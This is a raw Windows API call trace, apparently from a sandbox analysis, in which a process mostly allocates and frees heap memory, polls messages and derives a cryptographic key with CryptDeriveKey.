PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0187.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0187.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0187.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0187.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0187.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0187.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0187.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0187.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0187.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50b90 [0187.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50b90, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0187.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0187.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0187.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0187.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0187.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0187.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0187.476] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87510, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87390) returned 1 [0187.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0187.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0187.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0187.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0187.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0187.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0187.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0187.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0187.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0187.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0187.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0187.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0187.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0187.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0187.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0187.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0187.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0187.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0187.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0187.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0187.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0187.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0187.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0187.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0187.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0187.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0187.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0187.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0187.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0187.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0187.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0187.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0187.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0187.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0187.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0187.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0187.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0187.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0187.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0187.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0187.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0187.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0187.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0187.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0187.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0187.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0187.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0187.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0187.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0187.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0187.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0187.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0187.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0187.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0187.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0187.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0187.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0187.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0187.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0187.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0187.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0187.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0187.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0187.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0187.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0187.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0187.574] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0187.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0187.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0187.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0187.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0187.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0187.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0187.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0187.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0187.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0187.575] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0187.575] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0187.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0187.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0187.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0187.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0187.575] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0187.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0187.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0187.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0187.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0187.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0187.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0187.576] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0187.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0187.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0187.576] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0187.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0187.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0187.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0187.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0187.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0187.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0187.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0187.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0187.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0187.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0187.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0187.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0187.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b00 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c98 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b60 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a88 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0187.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0187.578] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0187.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0187.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50aa0 [0187.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0187.578] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0187.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0187.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0187.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0187.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0187.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0187.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0187.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0187.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0187.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0187.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 